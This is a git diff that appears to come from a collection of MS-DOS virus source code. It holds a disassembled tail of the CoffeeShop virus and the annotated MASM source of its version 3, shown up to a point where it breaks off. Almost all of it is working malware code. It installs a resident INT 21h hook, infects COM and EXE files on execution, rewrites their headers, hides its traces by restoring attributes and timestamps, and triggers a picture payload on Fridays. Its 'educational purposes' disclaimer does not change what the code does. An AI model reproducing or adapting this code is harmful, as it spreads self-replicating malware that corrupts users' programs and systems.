+;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + pop si + mov di,100h + sub si,20h + push ax + push ds + push es + push di + push si + cld ; Clear direction + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + xchg ah,al + cmp ax,30Ah + jb loc_3 ; Jump if below + mov ax,33DAh + int 21h ; ??INT Non-standard interrupt + cmp ah,0A5h + je loc_3 ; Jump if equal + mov ax,es + dec ax + mov ds,ax + xor bx,bx ; Zero register + cmp byte ptr [bx],5Ah ; 'Z' + jne loc_3 ; Jump if not equal + mov ax,[bx+3] + sub ax,72h + jc loc_3 ; Jump if carry Set + mov [bx+3],ax + sub word ptr [bx+12h],72h + mov es,[bx+12h] + push cs + pop ds + mov cx,620h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push es + pop ds + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_1e,bx + mov ds:data_2e,es +;* mov dx,offset loc_1 + db 0BAh, 01h, 02h + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + cmp al,5 + jne loc_3 ; Jump if not equal + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + or dh,dh ; Zero ? + jnz loc_3 ; Jump if not zero + pop ax + push ax + call sub_3 +loc_3: + pop si + pop di + pop es + pop ds + pop ax + cmp byte ptr cs:[si+1Ch],0 + je loc_4 ; Jump if equal + mov bx,ds + add bx,10h + mov cx,bx + add bx,cs:[si+0Eh] + cli ; Disable interrupts + mov ss,bx + mov sp,cs:[si+10h] + sti ; Enable interrupts + add cx,cs:[si+16h] + push cx + push word ptr cs:[si+14h] + retf ; Return far +loc_4: + push di + mov cx,1Ch + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + mov bx,ax + add bx,152h + push cs + push bx + add ax,62Fh + and ax,0FFF0h + mov di,ax + mov si,data_3e + mov cx,2E5h + push cs + pop es + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov cl,4 + shr ax,cl ; Shift w/zeros fill + mov dx,cs + add ax,dx + sub ax,10h + mov ds,ax + mov es,ax + push ax + mov ax,100h + push ax + retf ; Return far +sub_3 endp + + and [bp+di+6Fh],al + db 'ffeeShop ' + db 0B0h, 03h,0CFh, 9Ch, 3Dh,0DAh + db 33h, 75h, 05h,0B8h, 01h,0A5h + db 9Dh,0CFh + db 06h, 1Eh, 56h, 57h, 52h, 51h + db 53h, 50h, 3Dh, 00h, 4Bh, 74h + db 0Ch, 3Dh, 00h + db 6Ch, 75h, 0Ah + db 0F6h,0C3h, 03h, 75h, 05h, 8Bh + db 0D7h +loc_7: + call sub_4 +loc_8: + pop ax + pop bx + pop cx + pop dx + pop di + pop si + pop ds + pop es + popf ; Pop flags + jmp dword ptr cs:data_5e + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + cld ; Clear direction + push cs + pop es + mov si,dx + xor di,di ; Zero register + mov cx,80h + +locloop_9: + lodsb ; String [si] to al + cmp al,0 + je loc_12 ; Jump if equal + cmp al,61h ; 'a' + jb loc_10 ; Jump if below + cmp al,7Ah ; 'z' + ja loc_10 ; Jump if above + xor al,20h ; ' ' +loc_10: + stosb ; Store al to es:[di] + loop locloop_9 ; Loop if cx > 0 + + +loc_ret_11: + retn +loc_12: + stosb ; Store al to es:[di] + lea si,[di-5] ; Load effective addr + push cs + pop ds + lodsw ; String [si] to ax + cmp ax,452Eh + jne loc_13 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,4558h + jmp short loc_14 +loc_13: + cmp ax,432Eh + jne loc_ret_11 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,4D4Fh +loc_14: + jne loc_ret_11 ; Jump if not equal + std ; Set direction flag + mov cx,si + inc cx + +locloop_15: + lodsb ; String [si] to al + cmp al,3Ah ; ':' + je loc_16 ; Jump if equal + cmp al,5Ch ; '\' + je loc_16 ; Jump if equal + loop locloop_15 ; Loop if cx > 0 + + dec si +loc_16: + cld ; Clear direction + lodsw ; String [si] to ax + lodsw ; String [si] to ax + mov di,3BEh + mov cl,0Ch + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + jz loc_ret_11 ; Jump if zero + mov ax,3300h + int 21h ; DOS Services ah=function 33h + ; get ctrl-break flag in dl + push dx + cwd ; Word to double word + inc ax + push ax + int 21h ; DOS Services ah=function 33h + ; set ctrl-break flag dl=off/on + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + push es + push bx + push cs + pop ds + mov dx,offset int_24h_entry + mov ah,25h ; '%' + push ax + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,4300h + cwd ; Word to double word + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + push cx + xor cx,cx ; Zero register + mov ax,4301h + push ax + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_17 ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_18 ; Jump if carry=0 +loc_17: + jmp loc_24 +loc_18: + xchg ax,bx + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push dx + push cx + mov cx,1Ch + mov si,100h + mov dx,si + call sub_7 + jc loc_19 ; Jump if carry Set + mov ax,4202h + xor cx,cx ; Zero register + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov di,data_4e + mov [di],ax + mov [di+2],dx + cmp word ptr [si+12h],4021h + je loc_19 ; Jump if equal + cmp word ptr [si],5A4Dh + je loc_20 ; Jump if equal + mov byte ptr [si+1Ch],0 + test byte ptr [si],80h + jz loc_19 ; Jump if zero + cmp word ptr [di],0D000h + jae loc_19 ; Jump if above or = + cmp word ptr [di],7D0h + jb loc_19 ; Jump if below + call sub_10 + jnz loc_19 ; Jump if not zero + mov byte ptr [si],0E9h + mov ax,[di] + add ax,1Ah + mov [si+1],ax + jmp short loc_22 +loc_19: + jmp loc_23 +loc_20: + mov byte ptr [si+1Ch],1 + cmp word ptr [si+18h],40h + jb loc_21 ; Jump if below + mov ax,3Ch + cwd ; Word to double word + call sub_6 + jc loc_23 ; Jump if carry Set + mov ax,[si-4] + mov dx,[si-2] + call sub_6 + jc loc_23 ; Jump if carry Set + cmp byte ptr [si-3],45h ; 'E' + je loc_23 ; Jump if equal +loc_21: + call sub_9 + cmp [si+4],ax + jne loc_23 ; Jump if not equal + cmp [si+2],dx + jne loc_23 ; Jump if not equal + cmp word ptr [si+0Ch],0 + je loc_23 ; Jump if equal + cmp word ptr [si+1Ah],0 + jne loc_23 ; Jump if not equal + call sub_10 + jnz loc_23 ; Jump if not zero + call sub_8 + mov [si+4],ax + mov [si+2],dx + call sub_11 + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + sub ax,[si+8] + dec ax + add dx,2Dh + mov [si+16h],ax + mov [si+0Eh],ax + mov [si+14h],dx + mov word ptr [si+10h],17E0h + lea di,[si+0Ah] ; Load effective addr + call sub_5 + lea di,[si+0Ch] ; Load effective addr + call sub_5 +loc_22: + call sub_12 + mov word ptr [si+12h],4021h + mov cx,1Ch + mov dx,si + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_23: + pop cx + pop dx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_24: + pop ax + pop cx + cwd ; Word to double word + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + pop ax + pop dx + pop ds + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ax + pop dx + int 21h ; DOS Services ah=function 33h + ; set ctrl-break flag dl=off/on + retn +sub_4 endp + + inc bx + dec di + push bx + inc bx + inc bx + dec sp + push si + push bx + dec si + inc bp + dec ax + push sp + push sp + inc dx + push si + dec cx + push dx + inc cx + inc si + inc bp + dec bp + push sp + inc dx + push dx + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_5 proc near + mov ax,[di] + sub ax,62h + jc loc_25 ; Jump if carry Set + cmp ax,14Bh + jae loc_26 ; Jump if above or = +loc_25: + mov ax,14Bh +loc_26: + mov [di],ax + retn +sub_5 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_6 proc near + call sub_13 + mov dx,data_6e + mov cx,4 + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_7: + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + retn +sub_6 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_8 proc near + call sub_11 + add ax,620h + adc dx,0 + jmp short loc_27 + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_9: + call sub_11 +loc_27: + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + or dx,dx ; Zero ? + jz loc_ret_28 ; Jump if zero + inc ax + +loc_ret_28: + retn +sub_8 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_10 proc near + call sub_11 + call sub_13 + mov cx,620h + mov dx,si + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + cmp ax,cx + retn +sub_10 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_11 proc near + mov ax,[di] + mov dx,[di+2] + retn +sub_11 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_12 proc near + xor ax,ax ; Zero register + cwd ; Word to double word + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_13: + xchg cx,dx + xchg ax,dx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_12 endp + + and [di+4Bh],cl + and [bx],ah + cmp [bp+si],si + and ds:data_15e[bx],bh + cmp di,sp + jb loc_29 ; Jump if below + mov ah,4Ch ; 'L' + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_29: + mov si,403h + mov cx,170h + std ; Set direction flag + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + cld ; Clear direction + mov si,di + mov di,100h + lodsw ; String [si] to ax + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h + jmp $+1439h + adc ax,7FDFh + cld ; Clear direction + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov ah,0 + push ax + sti ; Enable interrupts + mov bh,0B0h + cmp al,7 +;* je loc_31 ; Jump if equal + db 74h,0FFh + dec word ptr [bp+si] + cmp al,4 + jae $+2Ah ; Jump if above or = + mov bh,0B8h + cmp al,2 + jb $+24h ; Jump if below + mov es,bx + mov si,140h + db 0FFh,0FFh,0B0h, 19h, 57h,0B1h + db 50h,0F3h,0A5h, 5Fh, 81h,0C7h + db 0A0h, 00h,0FEh,0C8h, 75h,0F2h + db 03h, 8Fh,0B8h, 07h, 0Eh,0D6h + db 0FBh, 0Ch,0CDh, 21h, 58h,0F8h + db 63h,0A7h,0CBh, 20h, 02h,0FEh + db 20h, 00h,0FAh,0EBh,0B0h,0FCh + db 0F8h, 03h, 77h,0F0h,0E0h,0D0h + db 41h, 0Fh,0C0h, 2Fh, 07h, 1Dh + db 80h, 6Fh,0BAh,0DCh,0E1h, 34h + db 0DBh, 0Ch,0F8h,0F0h, 0Eh,0DFh + db 0FEh,0F4h,0F8h,0BBh,0AEh,0F8h + db 0E4h, 03h, 84h,0E0h,0FCh,0EBh + db 0B0h,0E6h,0EAh,0A3h, 83h,0DAh + db 0AAh, 0Eh,0DCh, 09h,0BAh,0C8h + db 01h, 3Ah,0F0h, 50h, 07h,0A2h + db 0E8h,0E0h,0ACh, 05h,0DBh, 0Eh + db 77h, 0Fh,0F8h,0DCh,0F6h,0BAh + db 0AEh,0F0h,0F6h,0EBh, 3Ah,0F0h + db 0F4h,0E0h, 40h, 17h,0FAh +loc_33: + in al,dx ; port 10h ??I/O Non-standard + sbb ax,0DF72h + esc 2,dl ; coprocessor escape + jz loc_33 ; Jump if zero + mov dx,20DDh + sbb ax,0DE74h + and [bp+si-45F9h],ch + esc 0,[bx+di-8] ; coprocessor escape + inc di + xchg di,ax + call $-171Ch + clc ; Clear carry flag + xchg ax,dx + hlt ; Halt processor + add [di],bl + db 60h,0D8h,0E8h, 09h,0DCh,0FEh + db 09h,0F8h,0B0h, 23h,0F8h, 5Ch + db 0D7h,0FCh,0F8h,0FCh,0E8h, 01h + db 3Bh,0F4h,0ECh, 80h,0D2h, 1Dh + db 0BEh,0BAh, 5Ch, 20h, 7Ch, 03h + db 75h, 60h,0CAh, 20h, 0Eh,0B2h + db 0D8h, 81h,0F0h, 3Bh, 40h, 92h + db 0D7h,0B5h,0CEh,0F8h,0DCh, 60h + db 0A7h, 41h,0DEh, 60h, 02h,0B5h + db 0BEh, 3Ch, 20h, 0Fh, 7Bh, 22h + db 65h, 07h, 15h, 60h, 6Eh, 42h + db 68h,0B8h, 20h,0FEh,0FCh,0AEh + db 23h,0FCh,0E2h, 7Fh, 07h,0C0h + db 0B3h, 20h, 2Fh, 60h, 79h, 28h + db 6Ah,0DEh, 7Eh,0E0h, 08h,0D5h + db 09h,0E4h,0C0h, 60h,0C1h, 70h + db 0Bh,0DFh,0E4h, 42h,0D0h, 7Bh + db 4Fh, 5Eh, 9Ah, 05h,0ADh + db 22h + db 06h, 80h, 70h, 10h, 60h, 3Eh + db 05h,0CAh, 5Eh, 41h, 46h,0A4h + db 53h,0EFh, 15h + db 7Ah + db 97h,0C2h, 54h, 74h, 04h, 20h + db 60h, 50h, 45h, 01h,0C8h,0E8h + db 0DCh, 05h,0F9h, 06h, 54h,0D8h + db 0DEh, 41h, 2Dh, 78h, 7Ah, 01h + db 55h, 75h, 04h, 20h, 76h, 1Dh + db 0B8h, 2Eh,0EAh,0A0h,0C6h, 62h + db 55h, 83h, 8Ah, 5Eh, 09h,0C0h + db 0Ah, 5Ch, 20h,0C6h, 11h, 12h + db 0D0h, 2Ah, 74h, 58h, 5Dh, 5Eh + db 17h, 5Bh, 60h, 80h, 92h, 0Eh + db 40h,0EAh, 40h, 75h,0ACh, 62h + db 15h, 74h,0C4h, 59h, 5Eh,0C0h + db 9Dh,0C4h, 82h, 15h, 08h,0DCh + db 20h, 14h, 90h, 60h, 20h, 43h + db 66h, 62h, 94h, 50h, 3Bh, 65h + db 0ECh, 5Eh,0A4h, 1Dh,0CFh, 70h + db 80h,0C2h, 20h, 8Ah, 0Eh,0B2h + db 62h, 2Ah,0ECh, 69h,0CCh, 5Eh + db 80h, 55h,0BEh, 0Bh,0C0h, 80h + db 62h, 41h, 0Eh, 04h, 72h,0FEh + db 56h, 05h, 6Eh, 10h, 01h,0D5h + db 41h,0AEh,0FEh,0CEh, 9Eh,0D1h + db 08h,0FEh,0C4h,0E9h, 5Ch,0E6h + db 0AAh, 62h,0CCh,0C0h,0C8h, 01h + db 62h, 39h,0ECh, 6Ch,0F2h, 9Dh + db 62h,0BCh, 94h, 48h, 41h, 28h + db 4Ah, 45h, 38h, 26h,0FEh, 52h + db 1Ch, 5Ah, 5Fh,0FEh,0BEh, 40h + db 02h, 84h,0F2h, 0Ah,0B8h,0AEh + db 70h,0FEh,0FCh, 8Eh, 12h, 6Ah + db 0DEh, 54h,0D8h, 61h,0ACh, 50h + db 0B1h, 43h, 3Eh, 72h, 80h,0A3h + db 60h, 48h, 6Ah, 82h, 0Eh, 96h + db 02h, 66h, 3Ah, 6Ch, 58h, 84h + db 0B4h,0D1h, 01h, 5Ah, 48h, 3Ah + db 0EAh, 44h, 70h, 0Bh,0E8h,0D8h + db 24h, 9Eh, 28h, 12h, 73h,0C6h + db 54h,0D0h,0FFh + db 0F0h,0FFh, 60h, 34h, 50h, 00h + db 00h,0FFh + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_14 proc near + shr bp,1 ; Shift w/zeros fill + dec dl + jnz loc_ret_38 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h + +loc_ret_38: + retn +sub_14 endp + +loc_39: + call sub_14 + rcl bh,1 ; Rotate thru carry + call sub_14 + jc loc_42 ; Jump if carry Set + mov dh,2 + mov cl,3 + +locloop_40: + call sub_14 + jc loc_41 ; Jump if carry Set + call sub_14 + rcl bh,1 ; Rotate thru carry + shl dh,1 ; Shift w/zeros fill + loop locloop_40 ; Loop if cx > 0 + +loc_41: + sub bh,dh +loc_42: + mov dh,2 + mov cl,4 + +locloop_43: + inc dh + call sub_14 + jc loc_44 ; Jump if carry Set + loop locloop_43 ; Loop if cx > 0 + + call sub_14 + jnc loc_45 ; Jump if carry=0 + inc dh + call sub_14 + jnc loc_44 ; Jump if carry=0 + inc dh +loc_44: + mov cl,dh + jmp short locloop_51 +loc_45: + call sub_14 + jc loc_47 ; Jump if carry Set + mov cl,3 + mov dh,0 + +locloop_46: + call sub_14 + rcl dh,1 ; Rotate thru carry + loop locloop_46 ; Loop if cx > 0 + + add dh,9 + jmp short loc_44 +loc_47: + lodsb ; String [si] to al + mov cl,al + add cx,11h + jmp short locloop_51 +loc_48: + mov cl,3 + +locloop_49: + call sub_14 + rcl bh,1 ; Rotate thru carry + loop locloop_49 ; Loop if cx > 0 + + dec bh +loc_50: + mov cl,2 + +locloop_51: + mov al,es:[bx+di] + stosb ; Store al to es:[di] + loop locloop_51 ; Loop if cx > 0 + +loc_52: + call sub_14 + jnc loc_53 ; Jump if carry=0 + movsb ; Mov [si] to es:[di] + jmp short loc_52 +loc_53: + call sub_14 + lodsb ; String [si] to al + mov bh,0FFh + mov bl,al + jc loc_39 ; Jump if carry Set + call sub_14 + jc loc_48 ; Jump if carry Set + cmp bh,bl + jne loc_50 ; Jump if not equal + xor bp,bp ; Zero register + xor di,di ; Zero register + xor si,si ; Zero register + xor dx,dx ; Zero register + xor bx,bx ; Zero register + xor ax,ax ; Zero register + jmp $-1480h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.coffshp3.asm b/MSDOS/Virus.MSDOS.Unknown.coffshp3.asm new file mode 100644 index 00000000..bf2786e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.coffshp3.asm @@ -0,0 +1,1674 @@ +;****************************************************************************** +;* CoffeeShop VIRUS version 3 +;* +;* Use MASM 4.0 to compile this source +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;****************************************************************************** + + + .RADIX 16 + + +_TEXT segment + + assume cs:_TEXT, ds:_TEXT + + +VERSION equ 3 +PICLEN equ last - beeld ;length of picture routine +FILELEN equ last - first ;length of virus +FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs +VIRPAR equ 00D0 ;space for resident virus +WORKPAR equ 0160 ;work space for engine +STACKOFF equ 1000 ;Stack offset +DATAPAR equ 0050 ;extra memory allocated +BUFLEN equ 1C ;length of buffer + + +;**************************************************************************** +;* data area for virus +;**************************************************************************** + + org 00E0 + +mutstack dw 0, 0 +oldlen dw 0, 0 +oi21 dw 0, 0 +minibuf db 0, 0, 0, 0 + + +;**************************************************************************** +;* data area for engine +;**************************************************************************** + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +flags db 0 + + +;****************************************************************************** +;* Begin of virus, installation in memory +;****************************************************************************** + + org 0100 + +first: call next ;get IP +next: pop si + + sub si,low 3 ;SI = begin virus + mov di,0100 + cld + + push ax ;save registers + push ds + push es + push di + push si + + mov ah,30 ;DOS version >= 3.1? + int 21 + xchg ah,al + cmp ax,030A + jb not_install + + mov ax,33DA ;already resident? + int 21 + cmp ah,0A5 + je not_install + + mov ax,es ;adjust memory-size + dec ax + mov ds,ax + xor bx,bx + cmp byte ptr [bx],5A + jne not_install + mov ax,[bx+3] + sub ax,(VIRPAR+WORKPAR) + jb not_install + mov [bx+3],ax + sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) + + mov es,[bx+12] ;copy program to top + push cs + pop ds + mov cx,FILELEN + rep movsb + + push es + pop ds + + mov ax,3521 ;get original int21 vector + int 21 + mov ds:[oi21],bx + mov ds:[oi21+2],es + + mov dx,offset ni21 ;install new int21 handler + mov ax,2521 + int 21 + + mov ax,33DBh ;init. random nr. generator + int 21 + + mov ah,2A ;ask date + int 21 + cmp al,5 ;friday ? + jne not_install + mov ah,2C ;ask time + int 21 + or dh,dh ;sec = 0 ? + jnz not_install + + mov ax,33DC ;show picture + int 21 + +not_install: pop si ;restore registers + pop di + pop es + pop ds + pop ax + + add si,(offset buffer) + sub si,di + cmp byte ptr cs:[si],4Dh ;COM or EXE ? + je entryE + +entryC: push di + mov cx,BUFLEN + rep movsb + ret + +entryE: mov bx,ds ;calculate CS + add bx,low 10 + mov cx,bx + add bx,cs:[si+0E] + cli ;restore SS and SP + mov ss,bx + mov sp,cs:[si+10] + sti + add cx,cs:[si+16] + push cx ;push new CS on stack + push cs:[si+14] ;push new IP on stack + db 0CBh ;retf + + +;****************************************************************************** +;* Interupt 24 handler +;****************************************************************************** + +ni24: mov al,3 ;to avoid 'Abort, Retry, ...' + iret + + +;****************************************************************************** +;* Interupt 21 handler +;****************************************************************************** + +ni21: pushf + + cmp ax,33DA ;install-check ? + jne not_ic + mov ax,0A500+VERSION ;return a signature + popf + iret + +not_ic: push es ;save registers + push ds + push si + push di + push dx + push cx + push bx + push ax + + cmp ax,33DBh ;rnd init ? + jne not_ri + call rnd_init + jmp short no_infect + +not_ri: cmp ax,33DC ;show picture? + je show_pic + +not_pi: cmp ax,4B00 ;execute ? + je do_it + + cmp ax,6C00 ;open DOS 4.0+ ? + jne no_infect + test bl,3 + jnz no_infect + mov dx,di + +do_it: call infect + +no_infect: pop ax ;restore registers + pop bx + pop cx + pop dx + pop di + pop si + pop ds + pop es + popf + +org21: jmp dword ptr cs:[oi21] ;call to old int-handler + + +;****************************************************************************** +;* Show picture +;****************************************************************************** + +show_pic: mov ax,offset no_infect ;push return adres on stack + push cs + push ax + + mov di,((VIRPAR*10)+0100) ;move picture routine + mov si,offset beeld + mov cx,PICLEN + push cs + pop ds + push cs + pop es + rep movsb + + mov ax,cs ;calculate segment registers + add ax,low VIRPAR + mov ds,ax + mov es,ax + + push ax ;push picture adres on stack + mov ax,0100 + push ax + + db 0CBh ;(retf) goto picture routine + + +;****************************************************************************** +;* Tries to infect the file +;****************************************************************************** + +infect: cld + + push cs ;copy filename to CS:0000 + pop es + mov si,dx + xor di,di + mov cx,0080 +namemove: lodsb + cmp al,0 + je moved + cmp al,'a' + jb char_ok + cmp al,'z' + ja char_ok + xor al,20 ;convert to upper case +char_ok: stosb + loop namemove +return0: ret + +moved: stosb ;put last zero after filename + lea si,[di-5] + push cs + pop ds + + lodsw ;check extension .COM or .EXE + cmp ax,'E.' + jne not_exe + lodsw + cmp ax,'EX' + jmp short check + +not_exe: cmp ax,'C.' + jne return0 + lodsw + cmp ax,'MO' +check: jne return0 + + std ;find begin of filename + mov cx,si + inc cx +searchbegin: lodsb + cmp al,':' + je checkname + cmp al,'\' + je checkname + loop searchbegin + dec si + +checkname: cld ;check filename + lodsw + lodsw + mov di,offset names + mov cl,13 + repnz scasw + je return0 + + mov ax,3300 ;get ctrl-break flag + int 21 + push dx ;save flag on stack + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524 ;get int24 vector + int 21 + push es ;save vector on stack + push bx + + push cs + pop ds + + mov dx,offset ni24 ;install new int24 handler + mov ah,25 + push ax + int 21 + + mov ax,4300 ;ask file-attributes + cwd + int 21 + push cx ;save attributes on stack + + xor cx,cx ;clear attributes + mov ax,4301 + push ax + int 21 + jc return1v + + mov ax,3D02 ;open the file + int 21 + jnc opened +return1v: jmp return1 + +opened: xchg ax,bx ;save handle + + mov ax,5700 ;get file date & time + int 21 + push dx ;save date & time on stack + push cx + + mov cx,BUFLEN ;read begin of file + mov si,offset buffer + mov dx,si + call read + jc closev + + mov ax,4202 ;goto end, get filelength + xor cx,cx + cwd + int 21 + + mov di,offset oldlen ;save filelength + mov [di],ax + mov [di+2],dx + + mov ax,word ptr [si+12] ;already infected? + add al,ah + cmp al,'@' + jz closev + + cmp word ptr [si],'ZM' ;EXE ? + je do_EXE + +do_COM: test byte ptr [si],80 ;maybe a strange EXE? + jz closev + + mov ax,word ptr [di] ;check lenght of file + cmp ah,0D0 + jae closev + cmp ah,1 + jb closev + + mov dx,ax + add dx,0100 + call writeprog ;call Engine and write virus + jne closev + + mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin + sub ax,low 3 + mov word ptr [si+1],ax + jmp done + +closev: jmp close + +do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? + jb not_win + + mov ax,003C + cwd + call readbytes + jc closev + + mov ax,word ptr [di+8] + mov dx,word ptr [di+0A] + call readbytes + jc closev + + cmp byte ptr [di+9],'E' + je closev + +not_win: call getlen + call calclen ;check for internal overlays + cmp word ptr [si+4],ax + jne close + cmp word ptr [si+2],dx + jne close + + cmp word ptr [si+0C],0 ;high memory allocation? + je close + + cmp word ptr [si+1A],0 ;overlay nr. not zero? + jne close + + call getlen ;calculate new CS & IP + mov cx,0010 + div cx + sub ax,word ptr [si+8] + dec ax + add dx,low 10 + + call writeprog ;call Engine and write virus + jne close + + mov word ptr [si+16],ax ;put CS in header + mov word ptr [si+0E],ax ;put SS in header + mov word ptr [si+14],dx ;put IP in header + mov word ptr [si+10],STACKOFF ;put SP in header + + call getlen + add ax,cx + adc dx,0 + call calclen ;put new length in header + mov word ptr [si+4],ax + mov word ptr [si+2],dx + + lea di,[si+0A] ;adjust mem. allocation info + call mem_adjust + lea di,[si+0C] + call mem_adjust + +done: call gotobegin + call rnd_get ;signature + mov ah,'@' + sub ah,al + mov word ptr [si+12],ax + mov cx,BUFLEN ;write new begin + mov dx,si + mov ah,40 + int 21 + +close: pop cx ;restore date & time + pop dx + mov ax,5701 + int 21 + + mov ah,3E ;close the file + int 21 + +return1: pop ax ;restore attributes + pop cx + cwd + int 21 + + pop ax ;restore int24 vector + pop dx + pop ds + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + ret + + +;****************************************************************************** 